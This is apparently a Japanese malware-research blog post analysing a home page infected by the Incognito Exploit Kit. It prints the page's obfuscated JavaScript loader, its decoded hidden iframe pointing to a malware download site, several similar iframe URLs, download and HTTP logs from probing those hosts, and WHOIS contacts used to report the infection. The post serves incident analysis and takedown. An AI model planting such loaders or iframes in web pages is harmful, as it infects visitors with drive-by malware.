本件の発見はIncognito Exploit Packのマルウェアに感染されたURLの事件です。感染されたサイトは日本のウェブサーバです、Apache/1.3.41で提供しているサーバ。脆弱性のトレースを見たらXSSかSqlInjectionっぽいので、つい最近ですからhttpdのログを確認したらアタッカーの情報が分かるかと思います。
さて、情報は下記となります↓
----■下記のウェブサーバ↓
catvmics.ne.jp / 211.133.224.140■下記のURLに
http://home1.catvmics.ne.jp/~tcymkato/上記のURLがIncognito exploit kit v2.0に感染されました。
■ウイルススキャン結果↓
File name: index.html MD5: e177062a423c8f3c70bb6952162f38da File size: 1.3 KB ( 1307 bytes ) File type: HTML Detection ratio: 31 / 42 Analysis date: 2012-03-30 09:14:02 UTC Result: [クリック]■マルウェア種類説明↓
アファイル :「などなど.html」又は「などなど.js」又は「などなど.php」 マルウェア種類: JavaScript Obfuscated IFRAME Trojan マルウェア名 : Trojan.Iframe, HTML/Framer, Downloader.JS.Psyme など マルウェア機能: マルウェアサイトへJavascriptIFRAMEでREDIRECTされています、 説明 : 本件のサンプルではINCOGNITO EXPLOIT PACKから感染されたURLです。 クリックしてしまうとマルウェアサイトへ飛ばされて、 マルウェアがダウンロードされます■調査説明↓ よくどうやって見つけるのかと聞かれるので↓ K-SHIELDスパムフィルターのログを見ると 本件の感染されたURLがスパム文書に書いてあります。個人情報の関係でスパム内容を見せる事が出来ませんが。 英文のスパムメール、海外からのソースIPのスパムメールです。 URLを(hxxp://home1.catvmics.ne.jp/~tcymkato/)をダウンロードしたら↓
--16:15:24-- hxxp://home1.catvmics.ne.jp/~tcymkato/ => `index.html' Resolving home1.catvmics.ne.jp... 211.133.224.140 Connecting to home1.catvmics.ne.jp|211.133.224.140|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1,300 (1.3K) [text/html] 100%[====================================>] 1,300 --.--K/s 16:15:24 (31.93 MB/s) - `index.html' saved [1300/1300]中身を見るとこんな感じですね↓ その中にあやしいJavaScriptコードを発見しました↓
<script language=JavaScript>function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,51,13,23,17,48,58,39,8,35,0,0,0,0,0,0, 36,9,53,25,33,46,60,41,43,11,5,32,44,22,40,37,15,26,62,30,27,47,20,42,18,34,19,0,0,0, 0,10,0,21,31,59,24,2,52,14,3,4,7,61,12,45,28,56,55,50,54,16,1,38,29,0,49,6,57); for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|= (t[x.charCodeAt(p++)-48])<↑私が使っている方法で(何回もこのブログに書きました)本スクリプトを 調査して解けましたので結果は下記のIFRAMEとなります ↓↓>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("CqF53Zlqw3Nf ljnf29zDVSdD2hl1epnfdS8OjMNB3Tlujrnf43k7_WNO3ymBtILBwIFYyHFYyTLYfZU19bE5aXgzf3A67ZS ODhE1y0Rzf106@IlzYbgk5bSo@9AujECu_qF53ZlqwUzD")</script>//document.write (s) <iframe width="1" height="1" src="http://32tsdgseg.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"↓↓<iframe width="1" height="1" src="http://32tsdgseg.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="> </iframe>"上記のURLは最近流行ったマルウェアのダウンロードURLです、手続きもされています。 既にブラックリストに登録されております↓ ↑ セキュリティ警告をバイパスしたら下記のページが出て来ました↓ payloadが削除されているっぽいですね、確認の為にダウンロードしましょう↓--16:36:12-- hxxp://32tsdgseg.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== => `QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==' Resolving 32tsdgseg.co.cc... 112.175.243.23, 112.175.243.22, 112.175.243.21, ... Connecting to 32tsdgseg.co.cc|112.175.243.23|:80... connected. HTTP request sent, awaiting response... 404 Not Found 16:36:12 ERROR 404: Not Found.↑イヤ本当かな…、別の方法で確認したら↓$ curl http://32tsdgseg.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>404 Not Found</TITLE> </HEAD><BODY> <H1>Not Found</H1> The requested URL /QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== was not found on this se rver.<P> <HR> <ADDRESS>Apache/1.3.39 Server at co.cc Port 80</ADDRESS> </BODY></HTML>↑本当にサーバからのレスポンスかどうか分からないので、もっと詳しくもう一度確認しました↓ 今回全てHTTPプロトコルのログを取って見ると↓hxxp://32tsdgseg.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== [REQUEST↓] GET /QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== HTTP/1.1 Host: 32tsdgseg.co.cc User-Agent: Mozilla/5.0 (FreeBSD 8.2; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ja,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive [ANSWER↓] HTTP/1.1 404 Not Found Date: Fri, 30 Mar 2012 07:41:04 GMT Server: Apache/1.3.39 (Unix) PHP/5.2.3 mod_ssl/2.8.30 OpenSSL/0.9.8g Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1↑これでOKです。本当に404エラーですね(笑 ※)何故ここ迄マルウェアのURLを確認する必要があるのか? よくあるマルウェアのやり方で…まずニセ404エラーページを作ります。 ニセ404の目的はwgetやfetchからのダウンロードが出来ないようにハッカーが設定した。 なので、私は全然404エラーを信用していません。 因みに、ダウンロードしたINDEX.HTMLに書いたその他のURLは大丈夫でしょうか? 先のスナップショットに戻りましょう、下記のマークしたのURLの事です↓ URLはこちら↓hxxp://shoughbo.com/images/start.php?id=vlnd↑URLフォーマットを見ると大丈夫じゃないですね、 本件の感染URLが古くて(2月感染の時期)Googleで検索をするしか出来ないので、結果は下記となります↓<iframe width="1" height="1" src="hxxp://guwtron. com/gizmod/start. php?id=vlnd"></iframe> <iframe width="1" height="1" src="hxxp://hegeam. com/gizmod/start.php?id=vlnd"></iframe> <iframe width="1" height="1" src="hxxp://disreco. com/images/start.php?id=vlnd"></iframe> <iframe width="1" height="1" src="hxxp://besimorr. com/images/start.php?id=vlnd"></iframe> <iframe width="1" height="1" src="hxxp://boxberil. com/images/start.php?id=vlnd"></iframe> <iframe width="1" height="1" src="hxxp://shoughbo. com/images/start.php?id=vlnd"></iframe> <iframe width="1" height="1" src="hxxp://accedee. com/css/start.php?id=vlnd"></iframe> などなど。。。↑本件のURL書き方を見ると「Incognito exploit kit v2.0」の感染URLの書き方です。 フォーマットは「などなど/start.php?id=○○」←で、○○は3か4桁ローマ字。 もう一つの証拠は、本件の感染URLを纏めたら下記の様に確認が出来ます↓ 因みに上記のURLをダウンロードしたら下記のファイルとなり↓ ↑ 1)は只のTRAPです、wgetやfetchでダウンロードしたら無限LOOPに陥ります 信じなかったら試してみて下さい(笑 2)これをダウンロードしたらcookieがブロックされます↓ $curl hxxp://dsnextgen.com/?epl=lCyOlNeLxrgojfvTOihO-CQWk19CQuEUyV3 868rQOfOiLvisYGgYUq9CglZdmsYZEFLQAaOWTyAjviq4KWlnjxFJDBKECX3v4M1Fk4 5OlkDvctRp7ENIZi6nDSHVJSikgkRH1ROyZe9Zitz2ctaO27fkA-M0GjSo3pRmqNGei j1Vg3qaTD0AjaahqSfqpwiVACBg3u-_AADgfwEAAECAWwoAAInF5JdZUyZZQTE2aFpCnAAAAPA -----結果↓------ cookie_callback('470015ac21ba4f756016af8b'); ----------- 3)を調査したら、また別のページが出て↓ ↑リンクのURLはあやしいでしょ?調査しましたが只の宣伝のサイトに向いています。 最後のIncognito Exploit Packの証拠は下記のブロックURLサイトに確認が出来ます↓
■感染されたサイトの情報↓(報告の連絡先/手続きの為)
a. [Domain Name] CATVMICS.NE.JP d. [Network Service Name] MICS CATV Internet Service l. [Organization Type] Network Service m. [Administrative Contact] TS23345JP n. [Technical Contact] KM1184JP p. [Name Server] ns.catvmics.ne.jp p. [Name Server] ns3.catvmics.ne.jp a. [JPNICハンドル] TS23345JP b. [氏名] 鈴木 武虎 c. [Last, First] Suzuki, Taketora d. [電子メイル] taketora@inc.catvmics.ne.jp a. [JPNICハンドル] KM1184JP b. [氏名] 森崎 健吾 c. [Last, First] Morisaki, Kengo d. [電子メイル] kengo@inc.catvmics.ne.jp f. [組織名] 株式会社西三河ニューテレビ放送 g. [Organization] Nishimikawa New-TV Broadcasting CORPORATION a. [Network Number] 211.133.224.0/22 b. [Network Name] MICSNET g. [Organization] Mics Network Corporation m. [Administrative Contact] JP00041980 n. [Technical Contact] JP00041980 p. [Nameserver] ns.catvmics.ne.jp p. [Nameserver] ns3.catvmics.ne.jp [Assigned Date] 2000/10/30
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック
Tweet
TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
マルウェアファイルが削除してくれまして、さらにサイトのアクセスがブロックされました、ご対応を有難う御座いました。本件の対応は終了です。下記は証拠です。
返信削除--14:05:53-- http://home1.catvmics.ne.jp/~tcymkato/
=> `index.html'
Resolving home1.catvmics.ne.jp... 211.133.224.140
Connecting to home1.catvmics.ne.jp|211.133.224.140|:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
14:05:53 ERROR 403: Forbidden.
ご協力頂き有難う御座いました。 m(_ _)m